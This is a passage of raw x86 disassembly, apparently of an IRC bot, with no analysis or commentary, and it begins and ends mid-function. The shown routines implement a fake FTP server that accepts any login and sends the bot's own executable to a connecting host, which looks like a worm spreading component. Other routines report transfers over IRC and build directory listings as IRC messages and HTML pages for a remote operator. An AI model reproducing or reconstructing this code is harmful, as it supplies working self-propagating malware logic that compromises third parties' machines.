mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_432FEC
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_41F02C
int 3 ; Trap to Debugger
sub_402795 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402875 proc near ; CODE XREF: sub_4028A8+11C�p
; sub_4028A8+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_40289D
loc_402887: ; CODE XREF: sub_402875+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_4028A4
inc eax
cmp eax, edx
jl short loc_402887
loc_40289D: ; CODE XREF: sub_402875+10�j
xor al, al
loc_40289F: ; CODE XREF: sub_402875+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4028A4: ; CODE XREF: sub_402875+21�j
mov al, 1
jmp short loc_40289F
sub_402875 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A8 proc near ; CODE XREF: .text:00412172�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_412DD0
mov eax, [ebp+arg_4]
dec eax
jz short loc_4028E5
dec eax
jz short loc_4028C3
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4028C3: ; CODE XREF: sub_4028A8+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_433514
push eax
call sub_4015FE
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_4028E5: ; CODE XREF: sub_4028A8+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_4334A0
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_402A0A
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_4335EC
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_406B1D
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458
cmp eax, ebx
jz short loc_402954
xor edi, edi
push edi
push 48h
push offset dword_42A368
push esi
call dword_433534
cmp eax, ebx
jnz short loc_40295B
loc_402954: ; CODE XREF: sub_4028A8+95�j
; sub_4028A8+CC�j ...
xor esi, esi
jmp loc_4029FE
; ---------------------------------------------------------------------------
loc_40295B: ; CODE XREF: sub_4028A8+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414
cmp eax, ebx
jz short loc_402954
cmp [ebp+var_200E], 0Ch
jnz short loc_402954
push edi
push 18h
push offset dword_42A3B4
push [ebp+arg_4]
call dword_433534
cmp eax, ebx
jz short loc_402954
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414
mov esi, eax
cmp esi, ebx
jz short loc_402954
cmp [ebp+var_200E], 2
jnz short loc_402954
push 10h
push offset loc_42A3D0
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
test al, al
jz short loc_4029DE
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_4029FC
; ---------------------------------------------------------------------------
loc_4029DE: ; CODE XREF: sub_4028A8+126�j
push 10h
push offset dword_42A3E4
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_4029FC: ; CODE XREF: sub_4028A8+134�j
mov esi, eax
loc_4029FE: ; CODE XREF: sub_4028A8+AE�j
push [ebp+arg_4]
call dword_4335AC
mov eax, esi
pop edi
loc_402A0A: ; CODE XREF: sub_4028A8+57�j
pop esi
pop ebx
leave
retn
sub_4028A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A0E proc near ; CODE XREF: sub_402B1D+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_41F1EC
push 0
push 1
push 2
call ds:dword_41F1F0
push [ebp+arg_0]
mov dword_432FF0, eax
mov [ebp+var_10], 2
call ds:dword_41F1F4
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_41F204
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_432FF0
call ds:dword_41F1F8
cmp eax, 0FFFFFFFFh
jnz short loc_402A86
push dword_432FF0
call ds:dword_41F1FC
call ds:dword_41F200
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_402A86: ; CODE XREF: sub_402A0E+60�j
xor eax, eax
inc eax
leave
retn
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A8B proc near ; CODE XREF: sub_402B1D+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_41F010
lea eax, [ebp+var_104]
push offset dword_41F968
push eax
call sub_413393
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_402AF8
jmp short loc_402B1A
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_402A8B+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_41313E
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_432FF0
call ds:dword_41F1E8
push 0Ah
call ds:dword_41F000
loc_402AF8: ; CODE XREF: sub_402A8B+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_402AC4
call sub_412F93
pop ecx
push dword_432FF0
call ds:dword_41F1FC
call ds:dword_41F200
xor eax, eax
inc eax
loc_402B1A: ; CODE XREF: sub_402A8B+37�j
pop esi
leave
retn
sub_402A8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_402B1D proc near ; DATA XREF: sub_401141+254�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call ds:dword_41F1EC
push esi
call sub_413820
push eax
call sub_412D64
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_432FF4, eax
call ds:dword_41F1F0
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call ds:dword_41F1C8
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call ds:dword_41F1CC
xor eax, eax
mov ax, word ptr dword_432FF4
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call ds:dword_41F204
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call ds:dword_41F1D0
test eax, eax
jl loc_4030B7
push 0Ah
push ebx
call ds:dword_41F1D4
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call ds:dword_41F1D8
cmp eax, 0FFFFFFFFh
jz loc_4030B7
mov ebx, ds:dword_41F1E8
loc_402C3C: ; CODE XREF: sub_402B1D+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_403086
loc_402C4A: ; CODE XREF: sub_402B1D+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_41E8A0
test eax, eax
jz loc_403079
cmp esi, [ebp+74h+var_8]
jnz short loc_402CE4
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call ds:dword_41F1E0
cmp eax, 0FFFFFFFFh
jz loc_403079
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_402CB6
loc_402CA8: ; CODE XREF: sub_402B1D+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_402CB6
inc ecx
cmp ecx, edx
jb short loc_402CA8
loc_402CB6: ; CODE XREF: sub_402B1D+189�j
; sub_402B1D+192�j
cmp ecx, edx
jnz short loc_402CCC
cmp edx, 40h
jnb short loc_402CCC
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_402CCC: ; CODE XREF: sub_402B1D+19B�j
; sub_402B1D+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_402CD4
mov [ebp+74h+var_4], eax
loc_402CD4: ; CODE XREF: sub_402B1D+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402B1D+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call ds:dword_41F1E4
test eax, eax
jg short loc_402D42
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_402D36
loc_402D06: ; CODE XREF: sub_402B1D+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_402D2B
inc eax
cmp eax, ecx
jb short loc_402D06
jmp short loc_402D36
; ---------------------------------------------------------------------------
loc_402D16: ; CODE XREF: sub_402B1D+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_402D2B: ; CODE XREF: sub_402B1D+1F0�j
dec ecx
cmp eax, ecx
jb short loc_402D16
dec [ebp+74h+var_228]
loc_402D36: ; CODE XREF: sub_402B1D+1E7�j
; sub_402B1D+1F7�j
push esi
call ds:dword_41F1FC
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402D42: ; CODE XREF: sub_402B1D+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_0 ; "%s %s"
push eax
call sub_412D93
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D81
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D81: ; CODE XREF: sub_402B1D+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D9E
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D9E: ; CODE XREF: sub_402B1D+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DBB
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DBB: ; CODE XREF: sub_402B1D+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DD8
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DD8: ; CODE XREF: sub_402B1D+2AC�j
push 4
mov edi, offset off_41FE14
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402DF6
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DF6: ; CODE XREF: sub_402B1D+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_402E29
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E29
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E29: ; CODE XREF: sub_402B1D+2E9�j
; sub_402B1D+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E5A: ; CODE XREF: sub_402B1D+31A�j
; sub_402B1D+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E99
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_402E85: ; CODE XREF: sub_402B1D+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E85
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_402ECD
; ---------------------------------------------------------------------------
loc_402E99: ; CODE XREF: sub_402B1D+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_402ED3
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_402EBE: ; CODE XREF: sub_402B1D+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402EBE
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_402ECD: ; CODE XREF: sub_402B1D+37A�j
push eax
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402ED3: ; CODE XREF: sub_402B1D+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_402F97
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_412D93
lea eax, [ebp+74h+var_F8]
push eax
call sub_412F42
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_412F42
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_412BB5
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_413809
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_412BB5
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402F97: ; CODE XREF: sub_402B1D+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40304C
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_402A0E
cmp eax, 1
pop ecx
pop ecx
jnz short loc_403041
call sub_402A8B
cmp eax, 1
jnz loc_403069
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_403032
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_4045DD
add esp, 14h
loc_403032: ; CODE XREF: sub_402B1D+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401C33
pop ecx
jmp short loc_403069
; ---------------------------------------------------------------------------
loc_403041: ; CODE XREF: sub_402B1D+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_403064
; ---------------------------------------------------------------------------
loc_40304C: ; CODE XREF: sub_402B1D+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_403069
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_403064: ; CODE XREF: sub_402B1D+25F�j
; sub_402B1D+27C�j ...
push [ebp+74h+arg_0]
call ebx
loc_403069: ; CODE XREF: sub_402B1D+4B6�j
; sub_402B1D+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_403079: ; CODE XREF: sub_402B1D+151�j
; sub_402B1D+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_402C4A
loc_403086: ; CODE XREF: sub_402B1D+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call ds:dword_41F1D8
cmp eax, 0FFFFFFFFh
jnz loc_402C3C
loc_4030B7: ; CODE XREF: sub_402B1D+C9�j
; sub_402B1D+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_402B1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030C4 proc near ; CODE XREF: sub_4039DE+149�p
; sub_4078FA+355D�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_420328 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_413859
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_40311D
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 14h
jmp loc_40323A
; ---------------------------------------------------------------------------
loc_40311D: ; CODE XREF: sub_4030C4+34�j
cmp [ebp+arg_C], ebx
jz loc_40321F
mov eax, edi
lea ecx, [eax+1]
loc_40312B: ; CODE XREF: sub_4030C4+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40312B
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40315C: ; CODE XREF: sub_4030C4+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40315C
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_403196: ; CODE XREF: sub_4030C4+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403196
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, edi
lea ecx, [eax+1]
loc_4031B6: ; CODE XREF: sub_4030C4+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031B6
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_4031ED: ; CODE XREF: sub_4030C4+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031ED
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40323A
; ---------------------------------------------------------------------------
loc_40321F: ; CODE XREF: sub_4030C4+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 10h
loc_40323A: ; CODE XREF: sub_4030C4+54�j
; sub_4030C4+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403243: ; CODE XREF: sub_4030C4+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403243
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_4032ED
lea edx, [eax+1]
loc_40326C: ; CODE XREF: sub_4030C4+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40326C
sub eax, edx
cmp eax, 2
jbe short loc_4032ED
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_403280: ; CODE XREF: sub_4030C4+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403280
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_40329C
loc_403290: ; CODE XREF: sub_4030C4+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40329C
dec eax
jnz short loc_403290
loc_40329C: ; CODE XREF: sub_4030C4+1CA�j
; sub_4030C4+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_412C40
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_4032D2: ; CODE XREF: sub_4030C4+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4032D2
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
loc_4032ED: ; CODE XREF: sub_4030C4+19F�j
; sub_4030C4+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_41F054
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_41F050
test eax, eax
jz loc_40371A
mov ebx, 1FFh
loc_403319: ; CODE XREF: sub_4030C4+650�j
cmp [ebp+var_38C], 0
jz loc_403702
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_41F04C
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_41F048
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_403417
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_403390: ; CODE XREF: sub_4030C4+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_412BB5
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_403566
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_403422
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_412E0D
add esp, 28h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403417: ; CODE XREF: sub_4030C4+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_403390
; ---------------------------------------------------------------------------
loc_403422: ; CODE XREF: sub_4030C4+308�j
cmp [ebp+arg_C], edi
jz loc_403520
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_40344E: ; CODE XREF: sub_4030C4+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40344E
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_1 ; "%s%s/"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_403491: ; CODE XREF: sub_4030C4+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403491
push edi
